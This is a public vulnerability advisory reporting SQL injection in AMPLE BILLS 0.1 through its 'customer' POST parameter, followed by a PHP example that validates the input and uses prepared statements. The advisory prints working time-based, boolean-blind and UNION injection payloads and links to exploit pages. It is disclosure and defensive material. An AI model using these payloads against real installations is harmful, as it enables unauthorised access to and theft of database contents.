AMPLE BILLS 0.1 Multiple-SQLi
2024-4-15 00:42:7 Author: cxsecurity.com


## Title: AMPLE BILLS 0.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/13/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The customer parameter (#1*) appears to be vulnerable to SQL injection attacks.
The payload (select*from(select(sleep(20)))a) was submitted in the customer parameter.
The application took 20017 milliseconds to respond to the request, compared with 4 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be MySQL.
The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: customer=(-2876) OR 5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: customer=(-8147) UNION ALL SELECT CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)

## Time spent:
01:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
<http://nu11secur1ty.com/>
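
A defensive counterpart to the finding above, as an added example that is not from the advisory or the vendor's code: the two POST fields named in the payloads (`customer`, `issuedate`) are validated and then bound as parameters. The function names, the `bills` table and its columns, and the assumption that `customer` is a numeric key are hypothetical; the demo uses an in-memory SQLite database with constructed rows so it runs offline.

```php
<?php
declare(strict_types=1);

/** Accept only a positive integer id (assumption: customer is a numeric key). */
function parseCustomerId(string $raw): int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('customer must be a positive integer');
    }
    return $id;
}

/** Parse "MM/DD/YYYY - MM/DD/YYYY" (the issuedate format in the advisory) into ISO dates. */
function parseIssueDateRange(string $raw): array
{
    $parts = explode(' - ', $raw);
    if (count($parts) !== 2) {
        throw new InvalidArgumentException('issuedate must be a two-date range');
    }
    return array_map(static function (string $p): string {
        $d = DateTimeImmutable::createFromFormat('!m/d/Y', $p);
        // Round-trip comparison rejects overflow dates and trailing text.
        if ($d === false || $d->format('m/d/Y') !== $p) {
            throw new InvalidArgumentException('invalid date in issuedate');
        }
        return $d->format('Y-m-d');
    }, $parts);
}

function findBills(PDO $pdo, string $customer, string $issuedate): array
{
    $id = parseCustomerId($customer);
    [$from, $to] = parseIssueDateRange($issuedate);
    // Hypothetical table/columns; bound parameters travel separately from the SQL text.
    $stmt = $pdo->prepare('SELECT id FROM bills WHERE customer_id = :c AND issue_date BETWEEN :f AND :t');
    $stmt->execute([':c' => $id, ':f' => $from, ':t' => $to]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed demo data in an in-memory SQLite database (the advisory's target is MySQL).
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec("CREATE TABLE bills (id INTEGER PRIMARY KEY, customer_id INTEGER, issue_date TEXT)");
$pdo->exec("INSERT INTO bills VALUES (1, 7, '2024-03-20'), (2, 8, '2024-03-21')");
var_dump(findBills($pdo, '7', '03/15/2024 - 04/13/2024'));
try {
    findBills($pdo, '(-2876) OR 5249=5249#', '03/15/2024 - 04/13/2024');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The validation is defense in depth; the prepared statement is what removes the injection point, so it should stay even where a field cannot be type-checked this strictly.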



 



Source: https://cxsecurity.com/issue/WLB-2024040026